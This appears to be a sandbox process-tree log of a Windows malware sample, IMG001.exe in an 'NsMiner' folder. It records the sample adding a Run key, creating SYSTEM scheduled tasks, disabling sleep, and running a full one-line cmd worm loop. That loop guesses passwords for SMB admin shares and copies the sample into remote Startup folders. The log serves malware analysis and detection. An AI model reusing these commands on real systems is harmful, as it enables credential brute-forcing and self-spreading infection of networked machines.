C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1609" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1609" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1609" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1609" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"10.127.0.1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1609" /user:"administrator"4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1709& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- NTFS ADS
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
-
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "4⤵
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.15⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i " "5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
